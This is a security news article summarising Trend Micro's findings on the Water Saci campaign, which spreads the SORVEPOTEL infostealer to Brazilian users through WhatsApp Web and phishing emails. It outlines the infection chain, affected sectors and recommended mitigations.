SORVEPOTEL Malware Hijacks WhatsApp Web to Self-Propagate, Targets Brazilian Users
Trend Micro uncovers Water Saci campaign spreading SORVEPOTEL infostealer via WhatsApp, hijacking active sessions to propagate and steal financial credentials.
Trend Micro researchers have identified an active malware campaign dubbed Water Saci that spreads the SORVEPOTEL infostealer via WhatsApp. The malware uses malicious ZIP file attachments disguised as receipts or budgets, tricking users into opening them on a desktop. Once executed, it hijacks active WhatsApp Web sessions to automatically send copies of itself to all contacts and groups, enabling rapid propagation.
The attack chain begins with a phishing message containing a ZIP archive, often named "RES-20250930_112057.zip" or "ORCAMENTO_114418.zip." The message, written in Portuguese, urges recipients to download and open the file on a PC. Inside the ZIP is a Windows shortcut (.LNK) file that, when clicked, launches a PowerShell script to download the main payload from attacker-controlled domains. The payload is a .NET DLL that injects shellcode into powershell_ise.exe for persistence and data theft.
SORVEPOTEL is primarily an infostealer targeting financial institutions and cryptocurrency exchanges in Brazil. According to Trend Micro telemetry, 457 of 477 detected infections are concentrated in Brazil, with government and public service organizations hit hardest. The malware also impacts manufacturing, technology, education, and construction sectors. The campaign's focus on desktop execution suggests attackers are targeting enterprises rather than consumers.
The malware maintains contact with multiple command-and-control (C&C) servers and uses PowerShell to download and execute additional payloads in memory. It monitors banking-related activity and can steal credentials for various financial platforms. The self-propagation mechanism via WhatsApp Web causes infected accounts to be banned due to excessive spam activity, but not before the malware spreads widely.
Trend Micro notes that email is also used as an initial infection vector, with phishing emails distributing ZIP attachments named like "COMPROVANTE_20251001_094031.zip." These emails appear legitimate and use subjects such as "Documento de Rafael B" to entice recipients. The campaign highlights the abuse of trusted communication channels to bypass traditional security measures.
As a mitigation, Trend Micro recommends evaluating whether users need WhatsApp access and implementing clear BYOD policies. The campaign serves as a blueprint for similar attacks globally, emphasizing the need for modern defensive tactics and proactive monitoring of communication channels. Users should avoid opening suspicious attachments and verify messages from contacts before downloading files.